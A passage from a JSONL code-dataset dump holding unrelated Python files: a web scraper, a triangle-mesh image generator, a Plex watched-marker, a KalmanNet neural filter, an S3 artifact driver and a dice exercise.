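def connect_reply(role, cyborg, connected_to):
    reply = {"sender": role, "receiver": cyborg}
    if connected_to is not None:
        reply["action"] = "stillConnected"
        reply["value"] = connected_to
    else:
        reply["action"] = "ready"
    return json.dumps(reply)

print(connect_reply("client0", "cyborg1", None))       # action: ready
print(connect_reply("client0", "cyborg2", "cyborg1"))  # action: stillConnected
```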
Gtk.main_quit)\nwin.show_all()\nwin.dispMenu()\nGtk.main()\n","sub_path":"vorarbeit/interfaceAndXMPP/interfaceAndXMPP2.py","file_name":"interfaceAndXMPP2.py","file_ext":"py","file_size_in_byte":13123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"400723554","text":"import requests\nfrom bs4 import BeautifulSoup\n\nurl='https://blog.csdn.net/qq_40693171'\nreq=requests.get(url)\nres=req.text  # HTML source\nsoup=BeautifulSoup(res,'lxml')  # convert to a BeautifulSoup object\nnode=soup.find(id='mainBox').find_all(attrs={'class':'article-item-box'})\n#print(node[1])\nfor link in node:\n    value=link.h4\n    print(value.text)\n\n","sub_path":"爬虫/Include/csdn/test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"220531837","text":"#!/usr/bin/python\nimport logging\nfrom PIL import Image, ImageDraw\nimport random\nimport sys\nimport numpy as np\nimport math\nfrom scipy.spatial import Delaunay\n\n\nFGTHEMES = [\"fire.png\",\"ice.png\",\"darkgreen.png\",\"lightgreen.png\"]\n\nBGTHEMES = [\"black_bg.png\", \"white_bg.png\"]\n\n# Foreground/background color selectors used by setColor/setBW and the main block\nFGCOLOR_RED, FGCOLOR_FIRE, FGCOLOR_GREEN, FGCOLOR_BLUE, FGCOLOR_DGREEN, FGCOLOR_DBLUE = range(6)\nBGCOLOR_BLACK, BGCOLOR_WHITE = range(2)\n\n\ndef printUsage():\n\texit(\"Usage: <outputimage> <inputimage> <dots> [overlay]\")\n\ntry:\n\tif sys.argv[1] is None:\n\t\tprintUsage()\n\tif sys.argv[2] is None:\n\t\tprintUsage()\n\tif sys.argv[3] is None:\n\t\tprintUsage()\n\nexcept IndexError:\n\tprintUsage()\n\nFORMAT = \"%(asctime)-15s %(levelname)s %(message)s\"\nlogging.basicConfig(format=FORMAT, level=logging.INFO)\nlogger = logging.getLogger(\"main\")\nlogger.info(\"Starting!\")\n\nOUTPUTIMAGE = sys.argv[1]\nIN = Image.open(sys.argv[2])\nINPUTIMAGE = IN.load()\n(SIZEX, SIZEY) = IN.size\nif(SIZEX != SIZEY):\n\tlogger.error(\"The input image must be square!\")\n\texit(1)\nSIZE = SIZEY\nDOTS = int(sys.argv[3])\nOVERLAY = None\nOVERLAYIMAGE = None\nCOLORINDEX = 3\nFG = 1\nBG = 2\ntry:\n\tif sys.argv[4]:\n\t\tlogger.info(\"Use overlay\")\n\t\tOVERLAY = Image.open(sys.argv[4])\n\t\tOVERLAYIMAGE = OVERLAY.load()\n\t\t(w,h) = OVERLAY.size\n\t\tif w != SIZE or h != SIZE:\n\t\t\tlogger.error(\"Overlay dimensions must match the input image: %d x %d pixels\" % (SIZE,SIZE))\n\t\t\texit(1)\nexcept IndexError:\n\tpass\n\nLINEWIDTH = 0\n\ndef generateDots(ndots,size):\n\n\t# Random interior points; the four corners are pinned so the\n\t# triangulation always covers the full canvas.\n\tdots = np.random.randint(1, size-1, (ndots+4, 2))\n\tdots[0] = [0,0]\n\tdots[1] = [size-1,0]\n\tdots[2] = [0,size-1]\n\tdots[3] = [size-1,size-1]\n\n\ttris = Delaunay(dots)\n\n\treturn (dots,tris)\n\ndef setColor(fgcolor):\n\tif fgcolor is FGCOLOR_RED:\n\t\tc1 = 0 + int(random.random() * 255)\n\t\tc2 = 0 + int(random.random() * 30)\n\t\tc3 = 0 + int(random.random() * 30)\n\n\telif fgcolor is FGCOLOR_FIRE:\n\t\tif random.random() < 0.8:\n\t\t\tc1 = 255\n\t\t\tc2 = 40 + int(random.random() * 180)\n\t\t\tc3 = 0 + int(random.random() * 30)\n\t\telse:\n\t\t\tc1 = 209\n\t\t\tc2 = 0\n\t\t\tc3 = 0\n\n\telif fgcolor is FGCOLOR_GREEN:\n\t\tc1 = 200 - int(random.random() * 150)\n\t\tc2 = 255 - int(random.random() * 20)\n\t\tc3 = 60 + int(random.random() * 40)\n\n\telif fgcolor is FGCOLOR_BLUE:\n\t\tc1 = 2 + int(random.random() * 20)\n\t\tc2 = 170 + int(random.random() * 85)\n\t\tc3 = 210 + int(random.random() * 40)\n\n\telif fgcolor is FGCOLOR_DGREEN:\n\t\tc1 = 200 - int(random.random() * 150)\n\t\tc2 = 255 - int(random.random() * 20)\n\t\tc3 = 60 + int(random.random() * 40)\n\n\telse:  # FGCOLOR_DBLUE\n\t\tc1 = 2 + int(random.random() * 20)\n\t\tc2 = 10 + int(random.random() * 150)\n\t\tc3 = 210 + int(random.random() * 40)\n\n\treturn (c1,c2,c3)\n\ndef setBW(bgcolor):\n\tif bgcolor is BGCOLOR_WHITE:\n\t\tc1 = 255 - int(random.random() * 50)\n\t\tc2 = c1\n\t\tc3 = c1\n\telse:\n\t\tc1 = int(random.random() * 50)\n\t\tc2 = c1\n\t\tc3 = c1\n\n\treturn (c1,c2,c3)\n\ndef buildMesh(inImage, tris, dots):\n\tnewTris = []\n\n\tfor simplex in tris.simplices:\n\t\tx = np.average([int(dots[simplex[0]][0]),int(dots[simplex[1]][0]),int(dots[simplex[2]][0])])\n\t\ty = np.average([int(dots[simplex[0]][1]),int(dots[simplex[1]][1]),int(dots[simplex[2]][1])])\n\n\t\t(color1, color2, color3, alpha) = inImage[int(x),int(y)]\n\t\tif int(random.random() * 255) >= color1:\n\t\t\tsimplex = np.append(simplex,FG)\n\t\telse:\n\t\t\tsimplex = np.append(simplex,BG)\n\t\tnewTris.append([simplex[0], simplex[1], simplex[2], simplex[3]])\n\treturn (dots,newTris)\n\n\ndef exportPic(outImage, tris, dots, fgcolor, bgcolor, size, monobg = False, overlayImage = None, lineWidth=0):\n\tcanvas = (size,size)\n\tsvgGrad = \"\"\n\tsvgPoly = \"\"\n\n\tgradient = 0\n\n\tif bgcolor is BGCOLOR_WHITE:\n\t\tim = Image.new('RGB', canvas, (255,255,255))\n\telse:\n\t\tim = Image.new('RGB', canvas, (0,0,0))\n\tdraw = ImageDraw.Draw(im, 'RGBA')\n\n\tfor simplex in tris:\n\t\tx = np.average([int(dots[simplex[0]][0]),int(dots[simplex[1]][0]),int(dots[simplex[2]][0])])\n\t\ty = np.average([int(dots[simplex[0]][1]),int(dots[simplex[1]][1]),int(dots[simplex[2]][1])])\n\n\t\tif simplex[COLORINDEX] == FG:\n\t\t\t(c1,c2,c3) = setColor(fgcolor)\n\t\t\tdraw.polygon([dots[simplex[0]][0],dots[simplex[0]][1],dots[simplex[1]][0],dots[simplex[1]][1],dots[simplex[2]][0],dots[simplex[2]][1]], fill=(c1,c2,c3,255))\n\n\t\t\tp = 1.01\n\t\t\tgrad = '<linearGradient id=\"gradient%d\">\\n<stop offset=\"0\" stop-color=\"rgb(%d,%d,%d)\"/><stop offset=\"1\" stop-color=\"rgb(%d,%d,%d)\"/></linearGradient>\\n' % (gradient, c1,c2,c3, int(c1*p),int(c1*p),int(c1*p))\n\t\t\tsvgGrad = svgGrad + grad\n\t\t\tsvgPoly = svgPoly + '<polygon points=\"%d,%d %d,%d %d,%d\" fill=\"url(#gradient%d)\"/>\\n' % (dots[simplex[0]][0],dots[simplex[0]][1],dots[simplex[1]][0],dots[simplex[1]][1],dots[simplex[2]][0],dots[simplex[2]][1],gradient)\n\t\t\tgradient = gradient + 1\n\t\telse:\n\t\t\t(c1,c2,c3) = setBW(bgcolor)\n\t\t\t# Draw the bg parts only when not in monobg mode\n\t\t\tif not monobg:\n\t\t\t\tdraw.polygon([dots[simplex[0]][0],dots[simplex[0]][1],dots[simplex[1]][0],dots[simplex[1]][1],dots[simplex[2]][0],dots[simplex[2]][1]], fill=(c1,c2,c3,255))\n\n\t\t\t\tp = 1.01\n\t\t\t\tgrad = '<linearGradient id=\"gradient%d\">\\n<stop offset=\"0\" stop-color=\"rgb(%d,%d,%d)\"/><stop offset=\"1\" stop-color=\"rgb(%d,%d,%d)\"/></linearGradient>\\n' % (gradient, c1,c2,c3, int(c1*p),int(c1*p),int(c1*p))\n\t\t\t\tsvgGrad = svgGrad + grad\n\t\t\t\tsvgPoly = svgPoly + '<polygon points=\"%d,%d %d,%d %d,%d\" fill=\"url(#gradient%d)\"/>\\n' % (dots[simplex[0]][0],dots[simplex[0]][1],dots[simplex[1]][0],dots[simplex[1]][1],dots[simplex[2]][0],dots[simplex[2]][1],gradient)\n\t\t\t\tgradient = gradient + 1\n\n\t\t# Draw the gaps between triangles\n\t\tif bgcolor is BGCOLOR_BLACK:\n\t\t\tc = (0,0,0,255)\n\t\telse:\n\t\t\tc = (230,230,230,255)\n\n\t\tw = lineWidth\n\t\tif w != 0:\n\t\t\tdraw.line([dots[simplex[0]][0],dots[simplex[0]][1],dots[simplex[1]][0],dots[simplex[1]][1]], width=w, fill=c)\n\t\t\tdraw.line([dots[simplex[0]][0],dots[simplex[0]][1],dots[simplex[2]][0],dots[simplex[2]][1]], width=w, fill=c)\n\t\t\tdraw.line([dots[simplex[2]][0],dots[simplex[2]][1],dots[simplex[1]][0],dots[simplex[1]][1]], width=w, fill=c)\n\n\tif overlayImage is not None:\n\t\tim.paste(overlayImage, (0,0), overlayImage)\n\tim.save(outImage)\n\tsvg = '<svg xmlns=\"http://www.w3.org/2000/svg\">\\n' + '<defs>\\n' + svgGrad + '</defs>\\n' + svgPoly + '</svg>'\n\tf = open(\"test.svg\", \"w\")\n\tf.write(svg)\n\tf.close()\n\n# MAIN\nif __name__ == \"__main__\":\n\ttry:\n\t\t(dots,tris) = generateDots(DOTS, SIZE)\n\t\t(dots,tris) = buildMesh(INPUTIMAGE,tris, dots)\n\n\t\texportPic(OUTPUTIMAGE + \"_red_black.png\", tris, dots, FGCOLOR_RED, BGCOLOR_BLACK, SIZE, overlayImage = OVERLAY, lineWidth=LINEWIDTH)\n\t\texportPic(OUTPUTIMAGE + \"_fire_black.png\", tris, dots, FGCOLOR_FIRE, BGCOLOR_BLACK, SIZE, overlayImage = OVERLAY, lineWidth=LINEWIDTH)\n\t\texportPic(OUTPUTIMAGE + \"_red_white.png\", tris, dots, FGCOLOR_RED, BGCOLOR_WHITE, SIZE, overlayImage = OVERLAY, lineWidth=LINEWIDTH)\n\t\texportPic(OUTPUTIMAGE + \"_fire_white.png\", tris, dots, FGCOLOR_FIRE, BGCOLOR_WHITE, SIZE, overlayImage = OVERLAY, lineWidth=LINEWIDTH)\n\n\t\texportPic(OUTPUTIMAGE + \"_green_black.png\", tris, dots, FGCOLOR_GREEN, BGCOLOR_BLACK, SIZE, overlayImage = OVERLAY, lineWidth=LINEWIDTH)\n\t\texportPic(OUTPUTIMAGE + \"_blue_black.png\", tris, dots, FGCOLOR_BLUE, BGCOLOR_BLACK, SIZE, overlayImage = OVERLAY, lineWidth=LINEWIDTH)\n\t\texportPic(OUTPUTIMAGE + \"_green_white.png\", tris, dots, FGCOLOR_GREEN, BGCOLOR_WHITE, SIZE, overlayImage = OVERLAY, lineWidth=LINEWIDTH)\n\t\texportPic(OUTPUTIMAGE + \"_blue_white.png\", tris, dots, FGCOLOR_BLUE, BGCOLOR_WHITE, SIZE, overlayImage = OVERLAY, lineWidth=LINEWIDTH)\n\n\t\texportPic(OUTPUTIMAGE + \"_dgreen_black.png\", tris, dots, FGCOLOR_DGREEN, BGCOLOR_BLACK, SIZE, overlayImage = OVERLAY, lineWidth=LINEWIDTH)\n\t\texportPic(OUTPUTIMAGE + \"_dblue_black.png\", tris, dots, FGCOLOR_DBLUE, BGCOLOR_BLACK, SIZE, overlayImage = OVERLAY, lineWidth=LINEWIDTH)\n\t\texportPic(OUTPUTIMAGE + \"_dgreen_white.png\", tris, dots, FGCOLOR_DGREEN, 
BGCOLOR_WHITE, SIZE, overlayImage = OVERLAY, lineWidth=LINEWIDTH)\n\t\texportPic(OUTPUTIMAGE + \"_dblue_white.png\", tris, dots, FGCOLOR_DBLUE, BGCOLOR_WHITE, SIZE, overlayImage = OVERLAY, lineWidth=LINEWIDTH)\n\n\t\t#exportPic(OUTPUTIMAGE + \"_red_black_monobg.png\", tris, dots, FGCOLOR_RED, BGCOLOR_BLACK, SIZE, monobg = True, overlayImage = OVERLAY, lineWidth=LINEWIDTH)\n\t\t#exportPic(OUTPUTIMAGE + \"_fire_black_monobg.png\", tris, dots, FGCOLOR_FIRE, BGCOLOR_BLACK, SIZE, monobg = True, overlayImage = OVERLAY, lineWidth=LINEWIDTH)\n\t\t#exportPic(OUTPUTIMAGE + \"_red_white_monobg.png\", tris, dots, FGCOLOR_RED, BGCOLOR_WHITE, SIZE, monobg = True, overlayImage = OVERLAY, lineWidth=LINEWIDTH)\n\t\t#exportPic(OUTPUTIMAGE + \"_fire_white_monobg.png\", tris, dots, FGCOLOR_FIRE, BGCOLOR_WHITE, SIZE, monobg = True, overlayImage = OVERLAY, lineWidth=LINEWIDTH)\n\n\texcept KeyboardInterrupt as e:\n\t\tlogger.warning(\"Received KeyboardInterrupt! Terminating\")\n\t\texit(0)\n","sub_path":"trimesh_oldcolors.py","file_name":"trimesh_oldcolors.py","file_ext":"py","file_size_in_byte":9623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"316136099","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nPlex-MarkWatched is a useful to always mark a show as watched. This comes in\nhandy when you have a show you keep downloaded, but do not religiously watch\nevery single episode that is downloaded. By marking everything watched, it\nwill keep the show out of your OnDeck list inside Plex.\n\nUsage:\nIntended usage is to add the tak 'markwatched' to any show you want to have\nthis behaviour. Then simply add this script to run on a schedule and you\nshould be all set.\n\"\"\"\nfrom plexapi.server import PlexServer\n\n\nif __name__ == '__main__':\n plex = PlexServer()\n for section in plex.library.sections():\n if section.type in ('movie', 'artist', 'show'):\n for item in section.search(collection='markwatched'):\n print('Marking %s watched.' 
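In the triangulation record above, `generateDots` pins the four corners so the Delaunay mesh covers the whole canvas, and `buildMesh` classifies each triangle by sampling brightness at its centroid. A minimal sketch of that pipeline against a synthetic gradient instead of a real image:

```python
import numpy as np
from scipy.spatial import Delaunay

SIZE, NDOTS = 256, 50
rng = np.random.default_rng(0)

# Random interior points plus the four pinned corners, as in generateDots.
dots = rng.integers(1, SIZE - 1, (NDOTS + 4, 2))
dots[:4] = [[0, 0], [SIZE - 1, 0], [0, SIZE - 1], [SIZE - 1, SIZE - 1]]
tris = Delaunay(dots)

def brightness(x, y):
    return int(255 * x / SIZE)  # synthetic left-to-right ramp

fg = 0
for simplex in tris.simplices:
    cx, cy = dots[simplex].mean(axis=0)             # triangle centroid
    if rng.integers(0, 255) >= brightness(cx, cy):  # darker -> likelier FG
        fg += 1
print("%d of %d triangles classified as foreground" % (fg, len(tris.simplices)))
```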
% item.title)\n item.watched()\n","sub_path":"tools/plex-markwatched.py","file_name":"plex-markwatched.py","file_ext":"py","file_size_in_byte":862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"294063011","text":"\"\"\"# **Class: KalmanNet**\"\"\"\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as func\n\nfrom filing_paths import path_model\n\nimport sys\nsys.path.insert(1, path_model)\nfrom model import getJacobian\n\nnGRU = 2\n\nclass KalmanNetNN(torch.nn.Module):\n\n ###################\n ### Constructor ###\n ###################\n def __init__(self):\n super().__init__()\n self.device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n\n ######################################\n ### Initialize Kalman Gain Network ###\n ######################################\n\n def Build(self, ssModel, infoString = 'fullInfo'):\n\n self.InitSystemDynamics(ssModel.f, ssModel.h, ssModel.m, ssModel.n, infoString = 'fullInfo')\n self.InitSequence(ssModel.m1x_0, ssModel.T)\n\n # Number of neurons in the 1st hidden layer\n H1_KNet = (ssModel.m + ssModel.n) * (10) * 8\n\n # Number of neurons in the 2nd hidden layer\n H2_KNet = (ssModel.m * ssModel.n) * 1 * (4)\n\n self.InitKGainNet(H1_KNet, H2_KNet)\n\n\n\n def InitKGainNet(self, H1, H2):\n\n # Input Dimensions (+1 for time input)\n D_in = self.m + self.m + self.n # F1,3,4\n\n # Output Dimensions\n D_out = self.m * self.n; # Kalman Gain\n\n ###################\n ### Input Layer ###\n ###################\n # Linear Layer\n self.KG_l1 = torch.nn.Linear(D_in, H1, bias=True)\n\n # ReLU (Rectified Linear Unit) Activation Function\n self.KG_relu1 = torch.nn.ReLU()\n\n ###########\n ### GRU ###\n ###########\n # Input Dimension\n self.input_dim = H1\n # Hidden Dimension\n self.hidden_dim = ((self.n * self.n) + (self.m * self.m)) * 10 * 1\n # Number of Layers\n self.n_layers = nGRU\n # Batch Size\n self.batch_size = 1\n # Input Sequence Length\n self.seq_len_input = 1\n # Hidden Sequence Length\n self.seq_len_hidden = self.n_layers\n\n # batch_first = False\n # dropout = 0.1 ;\n\n # Initialize a Tensor for GRU Input\n # self.GRU_in = torch.empty(self.seq_len_input, self.batch_size, self.input_dim)\n\n # Initialize a Tensor for Hidden State\n self.hn = torch.randn(self.seq_len_hidden, self.batch_size, self.hidden_dim)\n\n # Iniatialize GRU Layer\n self.rnn_GRU = nn.GRU(self.input_dim, self.hidden_dim, self.n_layers)\n\n ####################\n ### Hidden Layer ###\n ####################\n self.KG_l2 = torch.nn.Linear(self.hidden_dim, H2, bias=True)\n\n # ReLU (Rectified Linear Unit) Activation Function\n self.KG_relu2 = torch.nn.ReLU()\n\n ####################\n ### Output Layer ###\n ####################\n self.KG_l3 = torch.nn.Linear(H2, D_out, bias=True)\n\n ##################################\n ### Initialize System Dynamics ###\n ##################################\n def InitSystemDynamics(self, f, h, m, n, infoString = 'fullInfo'):\n \n if(infoString == 'partialInfo'):\n self.fString ='ModInacc'\n self.hString ='ObsInacc'\n else:\n self.fString ='ModAcc'\n self.hString ='ObsAcc'\n \n # Set State Evolution Function\n self.f = f\n self.m = m\n\n # Set Observation Function\n self.h = h\n self.n = n\n\n ###########################\n ### Initialize Sequence ###\n ###########################\n def InitSequence(self, M1_0, T):\n\n self.m1x_posterior = torch.squeeze(M1_0)\n self.m1x_posterior_previous = 0 # for t=0\n\n self.T = T\n self.x_out = torch.empty(self.m, T)\n\n 
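`InitKGainNet` above stacks Linear, ReLU, GRU, Linear, ReLU, Linear, so the learned Kalman gain comes out as an m*n vector that `step_KGain_est` later reshapes into a matrix. A shape-only sketch with toy dimensions; the hidden sizes here are arbitrary, not the ones computed in `Build`:

```python
import torch
import torch.nn as nn

m, n = 2, 2                     # state / observation dims
d_in, h1, h2, hidden = m + m + n, 32, 16, 40

l1, l2, l3 = nn.Linear(d_in, h1), nn.Linear(hidden, h2), nn.Linear(h2, m * n)
gru = nn.GRU(h1, hidden, num_layers=1)

features = torch.randn(d_in)            # concatenated f1/f3/f4 features
hn = torch.zeros(1, 1, hidden)          # (layers, batch, hidden)
x = torch.relu(l1(features))
out, hn = gru(x.view(1, 1, -1), hn)     # seq_len=1, batch=1
K = l3(torch.relu(l2(out.view(1, -1)))).reshape(m, n)
print(K.shape)                          # torch.Size([2, 2])
```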
self.state_process_posterior_0 = torch.squeeze(M1_0)\n self.m1x_prior_previous = self.m1x_posterior\n\n # KGain saving\n self.i = 0\n self.KGain_array = self.KG_array = torch.zeros((self.T,self.m,self.n))\n\n ######################\n ### Compute Priors ###\n ######################\n def step_prior(self):\n # Predict the 1-st moment of x\n self.m1x_prior = torch.squeeze(self.f(self.m1x_posterior))\n\n # Predict the 1-st moment of y\n self.m1y = torch.squeeze(self.h(self.m1x_prior))\n\n # Update Jacobians\n #self.JFt = get_Jacobian(self.m1x_posterior, self.fString)\n #self.JHt = get_Jacobian(self.m1x_prior, self.hString)\n\n self.state_process_prior_0 = torch.squeeze(self.f(self.state_process_posterior_0))\n self.obs_process_0 = torch.squeeze(self.h(self.state_process_prior_0))\n\n ##############################\n ### Kalman Gain Estimation ###\n ##############################\n def step_KGain_est(self, y):\n # Feature 1: yt - yt-1\n try:\n my_f1_0 = y - torch.squeeze(self.y_previous)\n except:\n my_f1_0 = y - torch.squeeze(self.obs_process_0) # when t=0 \n # my_f1_reshape = torch.squeeze(my_f1_0) \n y_f1_norm = func.normalize(my_f1_0, p=2, dim=0, eps=1e-12, out=None)\n\n # Feature 2: yt - y_t+1|t\n # my_f2_0 = y - torch.squeeze(self.m1y)\n # my_f2_reshape = torch.squeeze(my_f2_0) \n # y_f2_norm = func.normalize(my_f2_reshape, p=2, dim=0, eps=1e-12, out=None)\n\n # Feature 3: x_t|t - x_t-1|t-1\n m1x_f3_0 = self.m1x_posterior - self.m1x_posterior_previous\n m1x_f3_reshape = torch.squeeze(m1x_f3_0)\n m1x_f3_norm = func.normalize(m1x_f3_reshape, p=2, dim=0, eps=1e-12, out=None)\n\n # Reshape and Normalize m1x Posterior\n #m1x_post_0 = self.m1x_posterior - self.state_process_posterior_0 # Option 1\n\n # Featture 4: x_t|t - x_t|t-1\n m1x_f4_0 = self.m1x_posterior - self.m1x_prior_previous \n #m1x_reshape = torch.squeeze(self.m1x_posterior) # Option 3\n m1x_f4_reshape = torch.squeeze(m1x_f4_0)\n m1x_f4_norm = func.normalize(m1x_f4_reshape, p=2, dim=0, eps=1e-12, out=None)\n\n # Normalize y\n #my_0 = y - torch.squeeze(self.obs_process_0) # Option 1\n #my_0 = y - torch.squeeze(self.m1y) # Option 2\n # my_0 = y\n # y_norm = func.normalize(my_0, p=2, dim=0, eps=1e-12, out=None)\n #y_norm = func.normalize(y, p=2, dim=0, eps=1e-12, out=None);\n\n # Input for counting\n count_norm = func.normalize(torch.tensor([self.i]).float(),dim=0, eps=1e-12,out=None)\n\n # KGain Net Input\n KGainNet_in = torch.cat([y_f1_norm,m1x_f3_norm,m1x_f4_norm], dim=0)\n\n # Kalman Gain Network Step\n KG = self.KGain_step(KGainNet_in)\n\n # Reshape Kalman Gain to a Matrix\n self.KGain = torch.reshape(KG, (self.m, self.n))\n\n #######################\n ### Kalman Net Step ###\n #######################\n def KNet_step(self, y):\n # Compute Priors\n self.step_prior()\n\n # Compute Kalman Gain\n self.step_KGain_est(y)\n\n # Save KGain in array\n self.KGain_array[self.i] = self.KGain\n self.i += 1\n\n # Innovation\n # y_obs = torch.unsqueeze(y, 1)\n dy = y - self.m1y\n\n # Compute the 1-st posterior moment\n INOV = torch.matmul(self.KGain, dy)\n self.m1x_posterior_previous = self.m1x_posterior\n self.m1x_posterior = self.m1x_prior + INOV\n\n self.state_process_posterior_0 = self.state_process_prior_0\n self.m1x_prior_previous = self.m1x_prior\n self.y_previous = y\n\n # return\n return torch.squeeze(self.m1x_posterior)\n\n ########################\n ### Kalman Gain Step ###\n ########################\n def KGain_step(self, KGainNet_in):\n\n ###################\n ### Input Layer ###\n ###################\n L1_out = 
self.KG_l1(KGainNet_in)\n La1_out = self.KG_relu1(L1_out)\n\n ###########\n ### GRU ###\n ###########\n GRU_in = torch.empty(self.seq_len_input, self.batch_size, self.input_dim)\n GRU_in[0, 0, :] = La1_out\n GRU_out, self.hn = self.rnn_GRU(GRU_in, self.hn)\n GRU_out_reshape = torch.reshape(GRU_out, (1, self.hidden_dim))\n\n ####################\n ### Hidden Layer ###\n ####################\n L2_out = self.KG_l2(GRU_out_reshape)\n La2_out = self.KG_relu2(L2_out)\n\n ####################\n ### Output Layer ###\n ####################\n L3_out = self.KG_l3(La2_out)\n return L3_out\n\n ###############\n ### Forward ###\n ###############\n def forward(self, y):\n yt = torch.squeeze(y)\n '''\n for t in range(0, self.T):\n self.x_out[:, t] = self.KNet_step(y[:, t])\n '''\n self.x_out = self.KNet_step(yt)\n\n return self.x_out\n\n #########################\n ### Init Hidden State ###\n #########################\n def init_hidden(self):\n weight = next(self.parameters()).data\n hidden = weight.new(self.n_layers, self.batch_size, self.hidden_dim).zero_()\n self.hn = hidden.data","sub_path":"Extended_KalmanNet_nn.py","file_name":"Extended_KalmanNet_nn.py","file_ext":"py","file_size_in_byte":8962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"486451764","text":"import logging\nimport re\nimport boto\nimport boto.s3\nfrom boto.s3.key import Key\nfrom boto.s3.connection import OrdinaryCallingFormat\nfrom basedriver import BaseDriver\nfrom artifactcli.util import assert_type, ProgressBar\n\nDEFAULT_REGION = 'us-east-1'\nDEFAULT_INDEX_PREFIX = '.meta/index-'\n\n\nclass S3Driver(BaseDriver):\n \"\"\"\n S3 driver class\n \"\"\"\n\n def __init__(self, aws_access_key, aws_secret_key, bucket_name, group_id,\n region=None, index_prefix=None, connection=None):\n super(S3Driver, self).__init__(['aws_access_key', 'bucket_name', 'region', 'index_prefix'])\n self.aws_access_key = aws_access_key\n self.aws_secret_key = aws_secret_key\n self.bucket_name = bucket_name\n self.region = region or DEFAULT_REGION\n self.index_prefix = '%s/%s' % (group_id, index_prefix or DEFAULT_INDEX_PREFIX)\n self.__conn = connection\n self.__bucket = None\n\n def connect(self):\n self.__conn = self.__conn or boto.s3.connect_to_region(\n self.region,\n aws_access_key_id=self.aws_access_key,\n aws_secret_access_key=self.aws_secret_key,\n is_secure=True)\n self.__bucket = self.__conn.get_bucket(self.bucket_name)\n\n def bucket(self):\n if not self.__bucket:\n self.connect()\n return self.__bucket\n\n def index_path(self, artifact_id):\n return '%s%s.json' % (self.index_prefix, artifact_id)\n\n def artifact_ids(self):\n \"\"\"\n Get list of the artifact IDs in the directory\n\n :return: sorted list of artifact IDs\n \"\"\"\n keys = [k.name[len(self.index_prefix):] for k in self.bucket().list(prefix=self.index_prefix)]\n results = [re.search('(.*)[.]json', k) for k in keys]\n return sorted(r.group(1) for r in results if r)\n\n def read_index(self, artifact_id):\n \"\"\"\n Read index data from S3 bucket.\n\n :param artifact_id: artifact id to read\n :return: index json text in unicode\n \"\"\"\n index_path = self.index_path(artifact_id)\n logging.debug('Reading index: %s' % self.s3_url(self.bucket_name, index_path))\n k = self.bucket().get_key(index_path)\n if k:\n s = k.get_contents_as_string(encoding='utf-8')\n else:\n s = unicode()\n\n return assert_type(s, unicode)\n\n def write_index(self, artifact_id, s):\n \"\"\"\n Write index data to S3 bucket.\n\n :param artifact_id: artifact id 
to write\n :param s: index json text in unicode\n :return: None\n \"\"\"\n assert_type(s, unicode)\n\n index_path = self.index_path(artifact_id)\n logging.debug('Writing index: %s' % self.s3_url(self.bucket_name, index_path))\n k = Key(self.bucket())\n k.key = index_path\n k.set_metadata('Content-Type', 'application/json; charset=utf-8')\n k.set_contents_from_string(s.encode('utf-8'))\n\n def upload(self, local_path, remote_path, md5):\n \"\"\"\n Upload local file to S3 bucket.\n File will be overwritten when already exists.\n\n :param local_path: source file path\n :param remote_path: S3 path to upload\n :param md5: MD5 digest hex string to verify\n :return None\n \"\"\"\n k = Key(self.bucket())\n k.key = remote_path\n\n with ProgressBar():\n k.set_contents_from_filename(local_path)\n\n remote_md5 = self.bucket().get_key(remote_path).etag.strip('\"')\n assert md5 is None or md5 == remote_md5, \\\n 'Failed to check MD5 digest: local=%s, remote=%s' % (md5, remote_md5)\n\n logging.info('Uploaded: %s' % self.s3_url(self.bucket_name, remote_path))\n\n def download(self, remote_path, local_path, md5):\n \"\"\"\n Download file from S3 bucket.\n\n :param remote_path: S3 path to download\n :param local_path: local destination path\n :param md5: MD5 digest hex string to verify\n :return: None\n \"\"\"\n k = self.bucket().get_key(remote_path)\n if not k:\n raise ValueError('File not found: %s' % self.s3_url(self.bucket(), remote_path))\n remote_md5 = k.etag.strip('\"')\n assert md5 is None or md5 == remote_md5, \\\n 'Failed to check MD5 digest: local=%s, remote=%s' % (md5, remote_md5)\n\n with ProgressBar():\n k.get_contents_to_filename(local_path)\n\n logging.info('Downloaded: %s' % local_path)\n\n def delete(self, remote_path, md5):\n \"\"\"\n Delete file from S3 bucket.\n\n :param remote_path: S3 path to delete\n :param md5: MD5 digest hex string to verify\n :return: None\n \"\"\"\n k = self.bucket().get_key(remote_path)\n if not k:\n raise ValueError('File not found: %s' % self.s3_url(self.bucket(), remote_path))\n remote_md5 = k.etag.strip('\"')\n assert md5 is None or md5 == remote_md5, \\\n 'Failed to check MD5 digest: local=%s, remote=%s' % (md5, remote_md5)\n\n k.delete()\n logging.info('Deleted: %s' % remote_path)\n\n @classmethod\n def s3_url(cls, bucket_name, key):\n return 's3://%s/%s' % (bucket_name, key)\n","sub_path":"src/artifactcli/driver/s3driver.py","file_name":"s3driver.py","file_ext":"py","file_size_in_byte":5182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"585323423","text":"from random import randint\nfrom collections import OrderedDict\n#9-13\n\n\"\"\"#6-4\npython = {'lists': 'Allows you to store info in one place', 'if_statements':\n 'Allows you to examine current state of a program and respond appropriately'\n ,'dictionaires': 'Allows you to connect pieces of related information'\n }\nfor code,meaning in python.items():\n print(\"\\n\" + code + \":\" + meaning)\"\"\"\n \npython = OrderedDict()\n\npython['lists'] = 'Allows you to store info in one place'\npython['if_statements'] = 'Allows you to examine current state of a program \\\nand respond appropriately'\npython['dictionaires'] = 'Allows you to connect pieces of related information'\n\n#for functions,definitions in python.items():\n # print(functions + ': ' + definitions)\n\n#9-11\nclass Die():\n \"\"\"A six sided die\"\"\"\n def __init__(self):\n self.sides = 6\n \n def roll_die(self):\n \"\"\"Rolls die 10 times and prints number on die each time.\"\"\"\n 
